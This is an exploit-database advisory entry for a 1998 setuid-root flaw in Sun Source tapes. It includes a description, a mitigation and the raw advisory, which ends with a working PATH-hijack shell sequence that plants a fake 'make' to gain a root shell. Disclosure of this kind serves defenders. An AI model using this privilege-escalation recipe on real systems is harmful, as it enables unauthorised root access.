Setuid Root File Execution

vendor:

Sun Source Tapes

by:

SecurityFocus

7,2

CVSS

HIGH

Setuid Root File Execution

264

CWE

Product Name: Sun Source Tapes

Affected Version From: Sun Source tapes

Affected Version To: Sun Source tapes

Patch Exists: No

Related CWE: CVE-1998-0206

CPE: o:sun:sun_source_tapes

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

1998

This vulnerability affects Sun Source tapes installations, which have two setuid root files in the directory /usr/release/bin: makeinstall and winstall. These files are binary files which exec other programs without a full path or reseting the PATH environment variable. This makes it possible for users on that system to become root. An attacker can exploit this vulnerability by copying a shell to a writable directory, creating a makefile to set the permissions of the shell to 4777, setting the PATH environment variable to the writable directory, and then executing the makeinstall or winstall file.

Mitigation:

To mitigate this vulnerability, the setuid root files should be removed from the /usr/release/bin directory.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/21/info

This applies to sites that have installed Sun Source tapes 
only.

The Sun distribution of sources (sunsrc) has an installation
procedure which creates the directory /usr/release/bin and
installs two setuid root files in it: makeinstall and winstall.
These are both binary files which exec other programs: 
"make -k install" (makeinstall) or "install" (winstall) without
a full path or reseting the PATH enviroment variable.

This makes it possible for users on that system to become root.

$ cp /bin/sh /tmp/sh
$ echo chmod 4777 /tmp/sh > /tmp/make
$ chmod a+rx /tmp/make
$ set PATH=/tmp:$PATH
$ export PATH
$ /usr/bin/makeinstall
$ /tmp/sh
#